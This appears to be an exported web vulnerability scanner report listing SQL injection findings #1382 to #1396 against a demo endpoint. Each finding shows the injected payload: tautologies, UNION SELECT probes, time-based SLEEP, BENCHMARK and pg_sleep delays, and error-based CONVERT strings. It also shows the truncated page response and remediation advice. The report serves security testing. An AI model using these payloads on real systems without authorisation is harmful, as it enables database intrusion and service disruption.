DemoUser1#\nCWE-ID CWE-89\nIssue Number #1382Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(\n500000000/2))))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1383\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1384\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\" or \"1\"=\"1\"--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1385\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1386\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or \"\"-\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1387\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1388\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin') or '1'='1'/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1389\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1390\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1391\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1392\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1393\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1394\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1395Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1396\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> 